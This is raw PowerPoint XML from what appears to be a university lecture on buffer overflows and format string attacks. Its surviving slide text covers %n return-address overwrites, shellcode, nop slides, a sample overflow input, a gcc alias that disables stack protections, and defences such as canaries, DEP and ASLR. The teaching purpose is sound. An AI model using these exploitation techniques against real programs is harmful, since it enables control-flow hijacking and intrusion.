              <a:t> (next-instruction), s (next statement), x /&lt;spec&gt; (inspect memory), and p /&lt;spec&gt; (print variable)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spurious format specifiers to walk the stack until format string is reached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zero and width, e.g., %08x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Use format string buffer itself to encode addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two ways to overwrite ret address:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use %n </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for basic buffer overflow.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since 1996?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26328" y="4267200"/>
            <a:ext cx="373934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Assigned Reading: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Smashing the stack in 2011</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by Paul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Makowski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21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lot has happened…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Heap-based buffer overflows also common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>[not mentioned] fortified source by static analysis</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> can sometimes replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy_chk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Future Lectures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Canary (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc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Data Execution Protection/No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>eXecute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Address Space Layout Randomization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647700" y="5410200"/>
            <a:ext cx="7848600" cy="1046827"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst/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137160" bIns="0" rtlCol="0" anchor="t" anchorCtr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alias gcc732='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gcc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 -m32 -g3 -O1 -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fverbose-asm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 -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fno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-omit-frame-</a:t>
            </a:r>
            <a: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  <a:t>pointer</a:t>
            </a:r>
            <a:b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  <a:t>-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mpreferred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-stack-boundary=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-stack-protector -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>PIC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean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en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>D_FORTIFY_SOURCE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="1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753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little has changed…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Method to gain entry remains the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>format strings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What’s different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is shellcode: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78503" y="4191001"/>
            <a:ext cx="6386995" cy="2362199"/>
            <a:chOff x="1156805" y="4191000"/>
            <a:chExt cx="6386995" cy="2362199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1156805" y="4191000"/>
              <a:ext cx="6386995" cy="1295400"/>
              <a:chOff x="1156805" y="4191000"/>
              <a:chExt cx="6386995" cy="1295400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Picture 5" descr="oriented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8900" y="4276919"/>
                <a:ext cx="3644900" cy="1209481"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Picture 4" descr="return-.png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56805" y="4191000"/>
                <a:ext cx="2908300" cy="1295400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="programming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4852" y="5301402"/>
              <a:ext cx="5930900" cy="1251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3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863725"/>
            <a:ext cx="6400800" cy="727075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00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which bugs are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>exploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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0" descr="bsd-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2" y="1600200"/>
            <a:ext cx="251498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5105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mbria"/>
              </a:rPr>
              <a:t>Evil David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7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4343400" y="4419600"/>
            <a:ext cx="4343400" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/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ambria"/>
              </a:rPr>
              <a:t>Today, we are going to learn how to tell.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10232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 and Exploits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i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is a place where real execution behavior may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>deviate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> from expected behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> that gives an attacker an advantage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27909"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="596900" y="3566795"/>
          <a:ext cx="7924800" cy="29260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429000"/>
                <a:gridCol w="449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Method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Objective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Control Flow Hijack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Gain control of the instruction pointer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="240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Denial of Service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Cause program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to crash or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stop servicing clients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Information Disclosure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Leak private </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>information,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e.g., saved password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4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Control Flow Hijacks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Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ijacking Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format String Attacks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What’s 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wif0Q2wfUwWj2sLplz8m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a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:no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2471</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1014</Paragraphs>
  <Slides>65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Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>template</vt:lpstr>
      <vt:lpstr>1_template</vt:lpstr>
      <vt:lpstr>Exploits Buffer Overflows and Format String Attacks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bugs are exploitable?</vt:lpstr>
      <vt:lpstr>Bugs and Exploits</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Control Flow Recap</vt:lpstr>
      <vt:lpstr>Basic Execution</vt:lpstr>
      <vt:lpstr>cdecl – the default for Linux &amp; gcc</vt:lpstr>
      <vt:lpstr>Control Flow Hijack:  Always Computation + Control</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>What are Buffer Overflows?</vt:lpstr>
      <vt:lpstr>Basic Example</vt:lpstr>
      <vt:lpstr>“123456”</vt:lpstr>
      <vt:lpstr>“A”x68 . “\xEF\xBE\xAD\xDE”</vt:lpstr>
      <vt:lpstr>Frame teardown—1</vt:lpstr>
      <vt:lpstr>Frame teardown—2</vt:lpstr>
      <vt:lpstr>Frame teardown—3</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Executing system calls</vt:lpstr>
      <vt:lpstr>Shellcode example</vt:lpstr>
      <vt:lpstr>Program Example</vt:lpstr>
      <vt:lpstr>Execution</vt:lpstr>
      <vt:lpstr>Tips</vt:lpstr>
      <vt:lpstr>nop slides</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>Format String Attacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Channeling Vulnerabilities</vt:lpstr>
      <vt:lpstr>Don’t abuse printf</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Format String Functions</vt:lpstr>
      <vt:lpstr>Variadic Functions</vt:lpstr>
      <vt:lpstr>Assembly View</vt:lpstr>
      <vt:lpstr>Simple Example</vt:lpstr>
      <vt:lpstr>Stack Diagram</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Conversion Specifications</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Stack Diagram @ printf</vt:lpstr>
      <vt:lpstr>Viewing Stack</vt:lpstr>
      <vt:lpstr>Viewing Specific Address—1</vt:lpstr>
      <vt:lpstr>Viewing Specific Address—2</vt:lpstr>
      <vt:lpstr>Control Flow Hijack</vt:lpstr>
      <vt:lpstr>Specifying Length</vt:lpstr>
      <vt:lpstr>Overflow by Format String</vt:lpstr>
      <vt:lpstr>%n Format Specifier</vt:lpstr>
      <vt:lpstr>Writing to Specific Address</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>All in one write</vt:lpstr>
      <vt:lpstr>Practical gdb Tips</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>What’s new since 1996?</vt:lpstr>
      <vt:lpstr>A lot has happened…</vt:lpstr>
      <vt:lpstr>But little has changed…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2014-09-03T20:41:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-09-03T20:46:55Z</dcterms:modified>
</cp:coreProperties>
</file>